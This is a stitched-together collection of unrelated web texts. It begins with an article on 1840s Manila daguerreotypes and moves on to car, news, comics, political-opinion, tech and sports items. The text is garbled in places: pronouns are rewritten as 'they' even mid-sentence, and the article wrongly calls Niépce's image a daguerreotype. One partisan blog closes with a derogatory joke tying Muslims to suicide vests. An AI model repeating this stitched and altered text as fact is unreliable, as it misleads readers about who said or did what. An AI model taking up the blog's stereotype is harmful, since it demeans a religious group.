Notwithstanding its weak efforts to attract more visitors, the HSA is a museum-cum-research library where one can find world-class paintings by Goya, Velázquez and El Greco, just to name a few.
Also Read: The Way We Were: Rare Color Photos of the Philippines in the 1950s
For Luisa Casella and Rosina Herrera, however, what they discovered here in April 2007 are more memorable than most things displayed in the museum.
Tucked away in a cabinet at the 7th floor of the building were a group of 18 rare daguerreotypes of Manila from the 1840s, possibly the oldest photographic record of the Philippines ever discovered.
At that time, Casella and Herrera were both Andrew W. Mellon Fellows from the Advanced Residency Program in Photograph Conservation (ARP). Their original plan was to rummage HSA's photo collection and preserve what's left.
Things turned into a different direction when they found the Manila daguerreotypes inside a cardboard box.
Composed of 13 whole plates and 5 half-plates, the photos show incredibly preserved views of Manila, Marikina and Laguna never seen before by the public. Aware of the very nature of these early photographs, they soon embarked on a painstaking project to prevent the artifacts from suffering permanent damage.
To accomplish the mission, they sought the help of the oldest museum dedicated to photography–the George Eastman House. The latter's Photograph Conservation Department worked closely with different conservation scientists, putting all the work for 18 straight months just to ensure the housings and the photos themselves would be in tiptop shape.
The results, thankfully, are nothing short of remarkable.
Daguerreotypy 101.
A daguerreotype is the great granddaddy of modern-day photographs. It was named after the Frenchman Louis Daguerre who, in 1838, took a photo of a Parisian having their shoe shined.
The said picture, possibly the first in history to ever feature a human being, was produced using an early process pioneered by Daguerre himself.
In this system, particulates of silver, mercury, and gold were formed on the surface of a silvered copper plate.
Daguerre's camera required exposure times that could last as long as 15 minutes or so. Now you know why portraits from long ago have subjects who didn't bother to smile.
It may have achieved a milestone but Daguerre's photo doesn't hold the distinction of being the first daguerreotype in history. That honor belongs to a picture taken by Joseph Nicéphore Niépce, one of Daguerre's partners.
This oldest surviving photograph, estimated to have been taken either in 1826 or 1827, shows a view from Niépce's upstairs window at their estate in Le Gras, in the Burgundy region of France.
Also Read: Fantastic 116-Year-Old Color Pictures of the Philippines
Daguerreotypes are extremely sensitive, so much so that surface contact or even air pollution could render these photos permanently damaged. This is why as soon as the pictures were formed, pioneer photographers put them inside tightly sealed housings.
The daguerreotype housings are of two kinds: the French style and the British/American style.
Upon their discovery, the Manila daguerreotypes were enclosed in French style housings, also known as passe-partouts. Now, in order for them to estimate how old these pictures are, the experts looked at various elements, which included the features of the said housings.
In a detailed report by fifth cycle fellow Caroline Barcella of the Conservation Department at George Eastman House, they discussed that a typical French housing from the early 19th century consists of “a cover glass, a window mat, and a backing board bound together with paper sealing tape.”
From the early to late 1840s, the trend was to use a reverse painted cover glass which also served as the window mat. After that, a thick slanted mat was added just beneath the reverse painted cover glass.
Also Read: 20 Remarkable Colorized Photos Will Let You Relive Philippine History
Among the Manila daguerreotypes discovered, most have “reverse painted glass with an octagonal window opening” while others either have missing cover glass or a painted glass with a beveled mat.
Judging by the style of the housings and the photographic process used to produce these pictures, it can be said that the Manila daguerreotypes were taken from the early 1840s to the early 1850s.
Another element that the scientists looked into was the logo of the platemaker. Fifteen of the daguerreotypes discovered share the same logo–a six-pointed star–which suggests that they came from the same platemaker.
As for their identity, the conservation scientists had only one person in mind: Jules Alphonse Eugène Itier (1802-1877), the platemaker of the pictures displayed at the exhibition “Paris et le daguerreotype.” The said daguerreotypes bear the same “six-pointed star” logo and dated from 1842.
During the course of my research, I've also discovered that Itier once served as French attache at Peking, China. Between 1843 and 1846, they visited several Asian countries and took daguerreotypes of people and places they encountered along the way.
Some of Itier's surviving plates show the earliest portraits of Singapore, Borneo, and–surprise, surprise–Manila! They even described some of our ancestors as peaceful and meek, far from being the savages portrayed by the Westerners.
Is Jules Itier the same person who shot the Manila daguerreotypes discovered in New York City? Maybe. But one sure thing we know so far, and that is both the housings and plates are of French origin.
As for the real story behind these old pictures, we have to dig a little bit deeper to find the answers…
Faded photographs, eternal stories.
The Manila daguerreotypes were donated by a civil engineer named Charles Massa to the Hispanic Society of America in 1929. Their gift also included a historical handbook for those traveling to the Philippines, several photo albums, and nine ambrotypes, or the updated and cheaper version that slowly replaced daguerreotypes starting in the 1850s.
There's no existing clue that could explain how the daguerreotypes ended up in Massa's possession. The identity of Massa is a mystery in itself: Not much is known aside from the fact that they once owned a business related to design, was born in New York, and lived in New York City during the time of the donation.
READ: Rare Photos of Manila City Hall from 100+ Years Ago
On the back of the daguerreotype housings were inscriptions made by at least five different people. They indicate the exact location where the photos were taken. Three of these inscriptions, as shown below, also give us valuable clues about the people and stories related to these faded photographs.
From these clues, we can extract three information. First, whoever took these photos were obviously fluent in English. Second, the first inscription suggests that the owner once lived in a “country home” (meaning a secondary residence) in Mariquina. Lastly, the mention of the names “Mr. Sturgis” and “Mr. Dyce's” hints that the photographer was closely related to these people.
Noemi Espinosa, the assistant curator at the Hispanic Society of America, went on a search to find out more about these names. They discovered that H.P. Sturgis, whose name also appears on the box containing the ambrotypes, was, in fact, Henry Parkman Sturgis who co-founded Russell & Sturgis Company of Manila in 1828.
Also Read: 20 Rare Yearbook Photos of Influential Filipino Personalities
The Sturgises were among the first American families who settled in the Philippines long before the Philippine-American War. Their company, considered as the “greatest hemp and sugar-cane company” in the Philippines, remained active until 1875. “Mr. Dyce's,” meanwhile, could be the Englishman who led a trader insurance company established in Manila in 1850.
Let's now have a closer look at the 18 stunning Manila daguerreotypes organized into four groups: Manila district, Manila proper, Marikina, and provinces along the Laguna Lake. If you prefer a real-life encounter, you might want to visit the Hispanic Society of America in New York City.
Take note that this is for educational purposes only. Use of these photos for other reasons requires permission from Ms. Caroline Barcella, Hispanic Society of America, and the George Eastman House.
I. Manila district (circa 1840s-1850s)
II. Manila proper (circa 1840s-1850s)
III. Mariquina (circa 1840s-1850s)
IV. The Laguna (circa 1840s-1850s)
Philippine photography: A brief history
Daguerreotypes were first introduced to the world in 1839. Surprisingly, it only took a few years before it reached the Philippines, making it one of only two countries in Asia (the other one is India) who first used this early photographic process in the region.
The book Informe sobre el estado de las islas Filipinas en 1842 is the first to ever mention photography in the Philippines. It was written in 1843 by the Spanish diplomat, poet, and adventurer Sinibaldo de Mas who, according to a book by Antoni Homs i Guzmán, also introduced the use of daguerreotypes in the country in 1841.
Working as a diplomat of the Spanish government, Sinibaldo didn't get enough financial support from their bosses. In order to survive, they traveled around the Philippines armed with their camera. They reportedly took photos of the natives or places they visited and later sold the pictures.
How and where they got their daguerreotype camera remain a mystery, but there are two possible answers: First, they probably bought it in India in 1840, the same year the camera was first sold commercially in that country. Historical records show that Sinibaldo was in Bengala, India in 1839 and stayed there before going to the Philippines a year later. It's also possible that a Spaniard who was connected to Sinibaldo first bought the camera in Spain and had it shipped to Manila.
Also Read: 7 Rare Photos From Philippine History You've Never Seen Before
Whatever the reason, we'll probably never confirm it as no daguerreotypes by Sinibaldo have survived, perhaps because of the country's tropical climate.
Before the discovery in New York, we'd been told that the oldest existing photos from the Philippines were taken in the 1860s. The daguerreotypes show several Tinguian natives from the Abra province and were part of a collection by an unnamed French engineer.
The Tinguian photos were later ‘dethroned' by two older photos from the 1840s. One of them is a view of Intramuros, Manila while the other is a portrait of the photographer W. W. Wood. However, no one can pinpoint exactly how old these photos are, with some believing that Wood's portrait was probably shot in another country and brought here when they decided to open a studio in Manila.
The use of photography in the Philippines became widespread starting in the 1860s. The growth of the industry was more evident by the time the Suez Canal officially opened in 1869, enabling cameras and other photographic products to be easily transported from Europe to the Philippines.
Among the first establishments to sell these products were Zobel's pharmaceutical on Calle Real 13 and the pharmacy owned by Pablo Sartorius, Rafael Fernández, and Jorge de Ludewig.
Also Read: 10 Lesser-Known Photos from Martial Law Years That Will Blow You Away
The 1860s also saw the establishment of the first photo studios in the Philippines, the oldest of which was owned by the British photographer Albert Honiss. This Escolta-based studio, founded in 1865 and remained active until 1874, was commissioned to take pictures of the Russell & Sturgis Company as well as produce the beautifully-made photo album Vistas de Manila (Views of Manila).
Honiss was also credited for making excellent visiting cards from the 1860s, two of which show a Spaniard identified as “Bartolo” and two young Filipino schoolchildren.
Scenes from the tragic aftermath of the 1863 earthquake have also been preserved through photographs. The pictures, taken by the photographer of the Spanish Royal Household named Martínez Hébert, show the serious impact that the disaster had towards various religious and government buildings
The casualties included the Manila Cathedral, the San Fernando Market, and the residence of the Danish Consul, among others. These rare images are now kept in the Archive of the Royal Palace in Madrid.
A lot of things have changed in terms of how Filipinos use and perceive photography. But one thing remains constant, and that is our curiosity. The fact that you're reading this article only shows how powerful photographs are in grabbing someone's attention.
We use pictures to learn, to evoke emotions, to deliver a message, and to bring out change. Photos can also be the window to our past, a way for us to look back on where we came from without relying on texts and boring historical facts alone.
History comes alive when we have pictures to pique our curiosity. So the next time you see a very old photograph, look deeper and you might see an amazing story unfold.
Sign up and be the first to know about our latest articles 1 to 3 times a month. No spam, I promise! Leave this field empty if you're human:
References
(1991). DLSU Dialogue, 24(2), 23.
Barcella, C. (2009). Conservation Project of the Manila Daguerreotypes. George Eastman House-Notes on Photographs. Retrieved 25 May 2016, from http://goo.gl/MDjiFZ
Griggs, B. (2014). This may be the oldest surviving photo of a human. CNN. Retrieved 25 May 2016, from http://goo.gl/gBCqoo
Guardiola, J. (2006). El Imaginario Colonial: Fotografia en Filipinas durante el Periodo Espanol 1860-1898. Spanish Society for Cultural Action Abroad.
Hannavy, J. (2013). Encyclopedia of Nineteenth-Century Photography (p. 1314). Routledge.
Lee, F. (2011). An Outpost for Old Spain in the Heights. The New York Times. Retrieved 25 May 2016, from http://goo.gl/YpYejJ
The First Photograph. Harry Ransom Center – The University of Texas at Austin. Retrieved 25 May 2016, from http://goo.gl/EhuVV7
The Maserati MC12 is essentially a Ferrari Enzo that went to finishing school. For some that's a great thing, while others prefer the rawness of the Enzo. Either school of thought is in luck, because there are no wrong answers here and both cars are exceptional. Still, the MC12 is far rarer than the Enzo seeing as just 50 were produced compared to the nearly 400 Enzo examples originally churned out. Though if people keep crashing them, the Enzo could catch up in the rare department.
MUST SEE: Drifting Mustang Cop Car Versus Drifting Bikes, We All Win: Video
It's understandable then that you all should be excited when a MC12 comes up for sale. There happens to be one at this very moment sitting in the showroom at Ferrari of Newport Beach. It gets more interesting, however, because this one is finished in Tuxedo Black… and it's the only one of the 50-car run to wear this paint scheme. The rest were all done in blue and white.
This particular MC12 is street legal in 49 of the 50 states, with California being the only lame duck. Odd then that the car should be sitting for sale in California. Oh well, if we could afford the has-to-be-seven-figured price tag, we'd drive it anyway. You can run a car with no plates in California for an extended period of time, and this one wouldn't cause the batting of an eye with a paper tag on the back.
MUST SEE: 2015 Ford Mustang Gets 700-HP Supercharger Kit From Whipple
Not that we'd condone anyone out there doing such a thing*
*We totally condone it.**
**Per our lawyers, that last bit isn't true.***
***Forget about the lawyers… go enjoy your life.
via Motor Authority
More From High Gear Media:
KEOKUK, Iowa — Authorities are executing two search warrants Thursday at the Midwest Academy campus in Keokuk.
A release by the Iowa Department of Public Safety says the search warrants stem from an investigation of alleged sexual abuse involving a staff member of the Midwest Academy and a former student of the academy.
The academy is a therapeutic boarding school that assists students from all over the country and world.
The first search warrant is being executed at the Midwest Academy campus at 2416 340th St. in Keokuk.
The other warrant is being executed at a second location affiliated with the Midwest Academy at 2818 Hwy. 218 in Montrose.
Authorities did not release any additional information Thursday.
The FBI, Iowa Division of Criminal Investigation, Special Enforcement Operations Bureau, Internet Crimes Against Children Task Force, Iowa DCI Crime Lab Crime Scene Team, State Fire Marshal Division, Iowa State Patrol, Division of Intelligence and Fusion Center and the Lee County Sheriff's Office are involved in the investigation.
The Left bastardizes and destroys everything it touches, and race relations is a prime example. There was once a shameful time in America where people were segregated. this segregation was codified into law. But, as with other sins, and faults, American greatness overcame its own shortcomings. Liberals, that is to say actual Liberals, not what passes as “liberal” today helped greatly in turning that tide. Segregation died of its own sickness, and racism began to follow suit. Yes, of course the left would argue that racism is still prevalent in America, but the fact is that America is the most racially tolerant nation on earth. The fact is fewer and fewer people care about color, and more of us judge based on character not color. Yes, there are outliers, there always are. But these outliers are just that.
But, the Left cannot let this be the narrative, and, they have turned “racism” on its head. Once being color blind, not seeing race as an important factor was once the definition of tolerance. Now, anyone who defines themselves as color blind is attacked as racist. White people? They are all racist, even if they have close friends of different races. So-called “White privilege”, which is nothing but another concocted load of bovine excrement, is used to gin up hatred towards White people. Most disturbing is the new push towards a new segregation. Minorities, A.K.A. victim groups are told they need “safe spaces” where no White people are allowed. Discussions of race must exclude anyone that isn't a member of a “victim group”.
Like everything else, “racism” has been turned on its head by Leftists. Perhaps nothing can better illustrate this despicable campaign of racial segregation than racially segregated graduations at Harvard. Yes, graduations are the modern day version of separate but equal.
Two days before Courtney Woods dresses in a cap and gown for Harvard's traditional commencement, they will don a stole made of African kente cloth and address the crowd at a somewhat different event: a graduation ceremony for black students. Student organizers said the event, called Black Commencement 2017, is the first university wide ceremony for black students at Harvard and is designed to celebrate their unique struggles and achievements at an elite institution that has been grappling with its historic ties to slavery.
Unique struggles and achievements? Yes, because Ivy League students are sooooo oppressed! Especially at a school with “ties to slavery”.
“I can only imagine how special I will feel when I walk across that stage and be able to honor my identity and my struggle at Harvard,” said Woods, who is completing a master's degree at the Graduate School of Education. “I know this is exactly what students like me need to be inspired as we leave this place as emerging global leaders.”
Ah they are “special”. They need inspiration, as if graduating from Harvard is not inspiring enough. Not if you are suffering from Racial Obsession Syndrome to the point that your “identity” is all about your skin color. How sad, how truly sad. But Black students are not the only “victims” of graduating from Harvard.
Similar ceremonies have been held for Harvard undergraduates as well as for students at Stanford, Columbia, Temple, and other campuses. On May 23, Harvard will also hold its third annual graduation ceremony for students of Latin American descent.
And that is not all, now BGLTQ students can segregate themselves and obsess over their “identity” as well
While there is no corresponding “White Graduation” planned, there will be a “Latinx Graduation Ceremony” offered the same day as Black Commencement, and Harvard's Office of BGLTQ Student Life also held a “Lavender Graduation” for BGLTQ individuals on April 18, during which graduates were given rainbow stoles.
See! Let's all separate ourselves and climb into identity cocoons! I wonder what other identities will join this campaign of exclusionary thinking emoting? Let's see here
How about an Atheist students graduation? They would be safe from any mention of you-know-who by intolerant students who insist on exercising their natural rights of expression and religion.
How about a vegan graduation? No fur, or leather attire allowed, and please eat something before attending because the food will suck!
How about a separate ceremony for left-handed illegal immigrants? As long as we are self-segregating, and we all know how privileged those right-handed undocumented types can be.
Of course, there simply must be a separate ceremony for students who support Sharia Law. No women allowed who are not fully covered of course. And no women grads allowed because women are not to be educated. Also no members of any other faith, and certainly no Gay people, well except those who are going to be thrown from the stage and stoned to death as part of the after graduation revelry. And as an added perk, every graduate gets a “Death to America” stole, and a suicide vest, because tolerance!
Absurd examples? Yes. But what is Leftism if not absurd?
Home > Archive > 2009 > May > 17 Neutrality in different contexts Sunday, May 17, 2009 by Dave Winer. 1. In our world we call it net neutrality. It means that all packets are treated equally on the Internet. 2. Among journos, it's the distinction betw editorial and publishing functions, what's often referred to as a Chinese Wall. In the tech press, back when there was such a thing, they'd sometimes send an ad sales person to visit along with the editor-in-chief. The editor excuses themselves to go to the bathroom, the sales guy says "If you buy an ad he'll review the product." Even if they don't come out and say it, it's often understood. It also becomes obvious to the readers that this is going on, so they stop believing the reviews. It's likely it happens in areas businesses, like movie reviews. 3. In government, it's the separation of church and state. This is one of the ways freedom of religion is guaranteed. If there was a state religion, one which was part of the government, people of different faiths, or ones who don't practice any religion, would have fewer rights. When someone says the US is a "Christian nation" they're saying they don't believe in this separation. 4. At Microsoft they claimed to keep the systems and apps divisions separate. This became a farce when they claimed that the web browser was part of the system software, when it was clearly an app. This is how they justified their plan to suck the web into Windows. 5. You don't want your Internet Service Provider to also provide your cable TV because they might screw around with BitTorrent to keep you from getting your entertainment on the net, protecting their revenue from cable TV. So they make a promise to keep the two functions separate, and there's a scandal every time they fail to. 6. With Google it means that the search engineers don't talk to the advertising people about fine-tuning their algorithms so the biggest customers get the best results. It's because we believe that Google doesn't screw around that we trust their search. 7. I feel very strongly that this kind of neutrality should be the rule on Twitter, and I also know that it's not the rule. They make no attempt to separate operational and editorial functions. In a way this is very honest of them, but it's also long-term going to be bad for business, as people they don't favor look for other outlets for their creative work. 8. Halliburton got some sweet deals from the Bush Administration because the VP was their CEO until they became VP. Did the VP ever explicitly tell DoD employees to favor Halliburton? They didn't have to, the theory goes, everyone knew where they came from. This idea that you should keep certain functions separate from others permeates all human activities. It's so important we should have a theory for it, and a name that applies everywhere, so when a new thing comes along, no one need debate whether such separation is necessary or good. Unless somehow humans reinvented human nature, it's always both necessary and good. This is something I hope to discuss with Jay in this evening's Rebooting The News podcast.
View the forum thread.
Recent stories
Dave Winer, 54, pioneered the development of weblogs, syndication (RSS), podcasting, outlining, and web content management software; former contributing editor at Wired Magazine, research fellow at Harvard Law School, entrepreneur, and investor in web media companies. A native New Yorker, they received a Master's in Computer Science from the University of Wisconsin, a Bachelor's in Mathematics from Tulane University and currently lives in Berkeley, California. "The protoblogger." - NY Times. "The father of modern-day content distribution." - PC World. One of BusinessWeek's 25 Most Influential People on the Web. "Helped popularize blogging, podcasting and RSS." - Time. "The father of blogging and RSS." - BBC. "RSS was born in 1997 out of the confluence of Dave Winer's 'Really Simple Syndication' technology, used to push out blog updates, and Netscape's 'Rich Site Summary', which allowed users to create custom Netscape home pages with regularly updated data flows." - Tim O'Reilly. http://twitter.com/davewiner
Dave Winer
The conflict between Rann and Thanagar suffers its most harrowing casualty as DC revealed the true title of the upcoming mini-series debuting on October 5 as DEATH OF HAWKMAN #1 . Originally solicited as HAWKMAN AND ADAM STRANGE: OUT OF TIME, this six-issue monthly mini-series written by Marc Andreyko (WONDER WOMAN '77) with art by Aaron Lopresti (THE NEW 52: FUTURE'S END, LEGENDS OF TOMORROW/ METAMORPHO), combines the space-faring scientist adventurer with the winged police officer from Thanagar in a race against time to prevent the worlds of Rann and Thanagar from marching headlong into galactic destruction. After a career of galaxy-spanning adventures, Adam Strange finds themselves trying to live a "normal" life when he's pulled back into interplanetary calamity and chaos once again! When a seemingly normal Zeta beam transmission returns them to the planet Rann, they find the capital city of Ranagar in ruins, and their once peaceful beloved Alanna crying out for the blood of Rann's oldest enemy, Thanagar. The evil Despero has brainwashed Rann's citizens into thinking that Thanagar is responsible for the attack. As Rann gears up to counter-attack, the Hawkmen get word of the impending attack and plan a preemptive strike of their own. As both civilizations march toward war, both Strange and Katar Hol have now become fugitives from Rann and Thanagar. With certain death hanging over both their heads, the clock is ticking, and both heroes must race to find out Despero's ultimate goal and prevent the destruction of two worlds! Death of Hawkman #1 ( AUG160272 ) is in comic shops October 5. Interior art from DEATH OF HAWKMAN #1 ( AUG160272 )
Prayer shaming? Co-hosts on “Fox and Friends” freak out over the headline on the front page of today's edition of the New York Daily News that reads: “God Isn't Fixing This.”
A confused and outraged Elisabeth Hasselbeck said they were “disturbed” by the headline questioning the efficacy of prayer, before angrily declaring:
I say this, if you want to line up with terrorists and try to take God away, you're not on the right side. That's all I'd have to say to those politicians who want to tell you to stop praying.
Apparently Hasselbeck is unaware that almost always the terrorists are not trying to take God away, on the contrary, almost always terrorists believe they are acting on behalf of their God.
On the program co-host Steve Doocy had a copy of the paper and held it up, repeatedly, saying “if God won't fix this, we need more [gun] laws.”
The following is a partial transcript of the conversation via Media Matters:
STEVE DOOCY: On the cover of the Daily News they have politicized this already. ‘Hey, Republicans,' they're saying, “God isn't fixing this. As the latest batch of innocent Americans are left dying in pools of blood, cowards,” who they picture right here, Rand Paul, Paul Ryan, Ted Cruz, Lindsey Graham, oh, all Republicans, “cowards who could truly end gun scourge continue to hide behind meaningless platitudes.” ELISABETH HASSELBECK: You know, I was so disturbed by that cover. When you see tweets like Chris Murphy out of Connecticut saying “your ‘thoughts' should be about steps to take to stop to take this carnage. Your prayers should be for forgiveness if you do nothing again.” And then a tweet from the editor of ThinkProgress, Zack Ford, saying, “Try this: Stop thinking. Stop praying. Look up Einstein's definition of insanity. Stop (sic) acting on gun violence prevention measures.”
Thursday's front page shames Republicans who oppose gun control and think “prayers” are an adequate response to gun violence in America.
An early look at tomorrow's front page… GOD ISN'T FIXING THIS: https://t.co/eKUg5f03ec pic.twitter.com/j4gEFg9YtJ — New York Daily News (@NYDailyNews) December 3, 2015
The headline reads “God Isn't Fixing This,” and is surrounded by the tweets of four Republicans – Ted Cruz, Rand Paul, Lindsey Graham, and Paul Ryan – all of whom used the word “prayers” to recognize the attack in San Bernardino.
The subhead reads:
As latest batch of innocent Americans are left lying in pools of blood, cowards who could truly end gun scourge continue to hide behind meaningless platitudes.
A companion post from the New York Daily News notes:
Prayers aren't working. Another mass shooting prompted another round of silence Wednesday from GOP presidential candidates on the issue of gun control. Instead, while the Democratic presidential wannabes were calling for stricter gun laws in the wake of the San Bernardino massacre, the Republicans were preaching about prayer.
In fact, an examination of the Twitter feeds of 2016 presidential candidates demonstrates a distinct pattern: Republicans offer prayers; Democrats demand action.
Later in the “Fox and Friends” broadcast frequent contributor Robert Jeffress discussed the issue. Jeffress, an obnoxious Christian extremist and host of Pathway to Victory, a national radio and television ministry, said:
Look, prayer's not some meaningless activity we engage in to make ourselves feel better. When we pray, we're talking to somebody greater than ourselves and asking them to do some specific things — to heal those who are wounded, to give grace to those who've lost loved ones, to protect our law enforcement personnel. Prayer's always the right thing we should do, it's the first thing we should do, but it's not the only thing we should do.
Jeffress is wrong. Prayer is not a dialogue, it is a monologue: there is nobody “greater than ourselves” listening. And while prayer, like masturbation, may be a source of comfort and satisfaction for the individual, it does nothing to solve problems in the real world.
For the record, nobody is “prayer shaming.” Pray if it makes you happy. Masturbate if it makes you happy. But don't expect either activity to have any effect on gun violence in America.
Bottom line: Nobody is “prayer shaming.” However, for Fox and Friends, prayer is more effective than gun control, and if you disagree with that “you're lining up with terrorists.”
On Wednesday, while delivering a speech largely about income inequality and economic mobility, a populist president invoked a populist pope. After rattling off a laundry list of dire statistics, President Obama cited Pope Francis:
“Since 1979, when I graduated from high school, our productivity is up by more than 90 percent, but the income of the typical family has increased by less than 8 percent. Since 1979, our economy has more than doubled in size, but most of that growth has flowed to a fortunate few. The top 10 percent no longer takes in one-third of our income -- it now takes half. Whereas in the past, the average C.E.O. made about 20 to 30 times the income of the average worker, today's C.E.O. now makes 273 times more. And meanwhile, a family in the top 1 percent has a net worth 288 times higher than the typical family, which is a record for this country. So the basic bargain at the heart of our economy has frayed. In fact, this trend towards growing inequality is not unique to America's market economy. Across the developed world, inequality has increased. Some of you may have seen just last week, the pope themselves spoke about this at eloquent length. ‘How can it be,' they wrote, ‘that it is not a news item when an elderly homeless person dies of exposure, but it is news when the stock market loses two points?'”
This is a worldwide problem, as the pope made clear, but in this country it's particularly pernicious.
A study released last month by the World Economic Forum surveyed nearly 1,600 world leaders from academia, business, government and the nonprofit sector and found that of the top 10 trends facing the world in 2014, income inequality was second on the list. (According to the report, the top concern was “rising societal tensions in the Middle East and North Africa.”)
And although in America 51 percent of all income earned went to the wealthiest fifth of the population while only 3 percent went to the poorest fifth of the population, Americans were among the least likely to view inequality as a serious problem in the spring 2013 Pew Global Attitudes Project Survey.
Right now, the transaction is scheduled to close in the current quarter, which means we could hear something official about the future of the Yahoo and AOL brand names before too long. That's a bit later than originally anticipated; the delays came from Yahoo's huge security breach and the subsequent restructuring of the deal that saw Verizon save $350 million on its purchase.
Update, 8PM ET: Yahoo Finance reporter Daniel Roberts published a story in which they say that the Yahoo brand is not in fact going away. Instead, it'll be a company under the Oath "umbrella" of brands that'll also include AOL properties like TechCrunch, The Huffington Post and Engadget. Indeed, AOL CEO Tim Armstrong mentioned 20 brands in their tweet earlier; now we have a bit more clarity on that. A source familiar with the situation independently confirmed these details to Engadget as well.
Even before the name change became official, the internet passed swift, merciless judgement:
My Twitter feed is 60% "Oath" jokes, and this is why I love Twitter. — Shira Ovide (@ShiraOvide) April 3, 2017
My name suggestion for the combined websites will always be Verizon Zero Dawn — Casey Newton (@CaseyNewton) April 3, 2017
... well, it's better than Tronc at least. https://t.co/9DNWbujvb1 — Tim Stevens (@Tim_Stevens) April 3, 2017
i'll take this as a sign that the ya-hole campaign is DOA https://t.co/c4mJ8SpMzp — Christopher Trout (@Mr_Trout) April 3, 2017
Update: A report by Recode indicates that current Yahoo CEO Marissa Mayer (pictured above) will not continue with the new company
BEIJING/WASHINGTON (Reuters) - U.S. President Donald Trump has broken the ice with Chinese President Xi Jinping in a letter that said they looked forward to working with them to develop relations, although the pair haven't spoken directly since Trump took office.
FILE PHOTO: Chinese President Xi Jinping addresses the guests during a gift handover ceremony at the United Nations European headquarters in Geneva, Switzerland, January 18, 2017. REUTERS/Denis Balibouse/File Photo
The letter thanked Xi for their congratulatory note on Trump's inauguration and wished the Chinese people a prosperous Lunar New Year of the Rooster, the White House said in a statement on Wednesday.
“President Trump stated that they look forward to working with President Xi to develop a constructive relationship that benefits both the United States and China,” it said.
China said on Thursday it attached great importance to China-U.S. ties.
“We highly appreciate President Trump's holiday greetings to President Xi Jinping and the Chinese people,” Chinese Foreign Ministry spokesperson Lu Kang said at a daily press briefing.
Asked whether it was a snub that Trump had held calls with many other world leaders as president, but not Xi, Lu said: “This kind of remark is meaningless.”
They reiterated that China and the U.S. had maintained “close communication” since Trump took office and that cooperation was the “only correct choice”.
“China is willing to work with the United States in adhering to the principles of non-confrontation, mutual respect and mutual benefit to promote cooperation, control disputes, and on a healthy and stable foundation, promote greater development in China-U.S. ties,” Lu said.
Trump and Xi have yet to speak directly since Trump took office on Jan. 20, although they did talk soon after Trump won the U.S. presidential election in November.
Diplomatic sources in Beijing say China has been nervous about Xi being left humiliated in the event a call with Trump goes wrong and the details are leaked to the U.S. media.
Last week, U.S. ties with staunch ally Australia became strained after the Washington Post published details about an acrimonious phone call between Trump and Prime Minister Malcolm Turnbull. [nL4N1FN0JR]
“That is the last thing China wants,” a source familiar with China's thinking on relations with the United States told Reuters. “It would be incredibly embarrassing for President Xi and for Chinese people, who value the concept of face.”
A senior non-U.S. Western diplomat said China was unlikely to be in a rush to set up such a call.
“These things need to happen in a very controlled environment for China, and China can't guarantee that with the unpredictable Trump,” the diplomat said.
“Trump also seems too distracted with other issues at the moment to give too much attention to China.”
TAIWAN, YUAN IN FOCUS
There are a number of contentious areas where China fears Trump could go off script, the diplomat said, pointing in particular to the issue of self-ruled Taiwan, as well as trade.
Trump upset China in December by taking a phone call from Taiwan President Tsai Ing-wen. China considers Taiwan a wayward province with no right to formal diplomatic relations with any other country.
Trump has also threatened to slap tariffs on Chinese imports, accusing Beijing of devaluing its yuan currency and stealing U.S. jobs.
In their Senate confirmation hearing, U.S. Secretary of State Rex Tillerson said China should not be allowed access to islands it has built in the disputed South China Sea. The White House also vowed to defend “international territories” in the strategic waterway.
China has repeatedly said it has smooth contacts with the Trump team. The Foreign Ministry in Beijing said last week the two countries were remaining “in close touch”.
That contact has been led by China's top diplomat, State Councillor Yang Jiechi, who outranks the foreign minister.
Yang told Michael Flynn, Trump's National Security Advisor, last week that China hopes it can work with the United States to manage and control disputes and sensitive problems. [nL4N1FO364]
The source familiar with China's thinking said Trump's administration was “very clear” about China's position on Taiwan. Trump has yet to mention Taiwan since they took office.
Chinese state media has wondered whether Trump has a China policy at all.
On Thursday, the widely read Global Times tabloid, published by the ruling Communist Party's official People's Daily, noted that Trump had not immediately confronted China as had been expected because they had realized upsetting Beijing would backfire badly.
“He has probably realized that real tough action against China would result in a complex chain reaction, even beyond their control,” the paper said in an editorial.
Wang Yiwei, a professor of international relations at Beijing's elite Renmin University, said the letter suggested the new U.S. administration wanted to signal the importance it attached to the U.S.-China relationship without risking being confronted on specific issues.
“Trump has sent many messages that make the world confused, like on the South China Sea and ‘One China' policy, so if they make a phone call President Xi will ask ‘what do you mean?',” Wang said. “He wants to avoid this so they just sends a letter for the first step.”
Germany
Your browser is not supported by this application. Please use recent versions of browsers such as Google Chrome, Firefox, Edge or Safari to access 'Dive' interfaces.
Inscribed in 2016 (11.COM) on the Representative List of the Intangible Cultural Heritage of Humanity
© cine plus Leipzig GmbH 2015
A cooperative is an association of volunteers that provides services of a social, cultural or economic nature to members of the community to help improve living standards, overcome shared challenges and promote positive change. Based on the subsidiarity principle that puts personal responsibility above state action, cooperatives allow for community building through shared interests and values creating innovative solutions to societal problems, from generating employment and assisting seniors to urban revitalization and renewable energy projects. Anyone can participate, with members also able to acquire shares in the association and have a say in its future direction. The system makes available low-interest loans to farmers, craftspeople and entrepreneurs. Today, about a quarter of Germany's population are members of a cooperative, which besides farmers and craftspeople, includes 90 per cent of its bakers and butchers and
75 per cent of its retailers. Some cooperatives have also been set up specifically for students to gain experience. Associated knowledge and skills are transmitted by cooperatives, universities, the German Cooperative and Raiffeisen Confederation, The Akademie Deutscher Genossenschaften, the German Hermann-Schulze-Delitzsch Society and the German Friedrich-Wilhelm-Raiffeisen Society.
The Nashville Predators have officially recalled Frédérick Gaudreau from the Milwaukee Admirals. This news follows that of Marek Mazanec being recalled Thursday – the day after the Admirals were eliminated from the 2017 AHL Calder Cup Playoffs.
Gaudreau's work since the 2015-16 season with the Admirals has been among the top of the top. Their skill level as well as defensive and skating abilities were easy to spot when they arrived from the QMJHL as an undrafted AHL signing prior to the 2014-15 season but their offense jumped up in their sophomore campaign and increased even further this past season.
During the 2016-17 season, Gaudreau produced 48 points (25 goals, 23 assists) in 66 games with the Admirals in the AHL. They also logged their first career games in the NHL as a member of the Predators where they tallied an assist from 9 games. The soon-to-be 24-year old forward finished the Admirals recent playoff run as their leading scorer with 4 points (3 goals, 1 assist) in 3 games.
Prior to traveling from Milwaukee to Nashville we had the chance to speak with Gaudreau during the Admirals' Exit Day. These were their comments on the Admirals season and more.
Be sure to keep updated with Admirals Roundtable through social media platform of your choice: follow along Twitter, like us on Facebook, get photo updates on Instagram, and listen along on SoundCloud.
Share This Story: Twitter
Facebook
Reddit
Tumblr
Email
Print
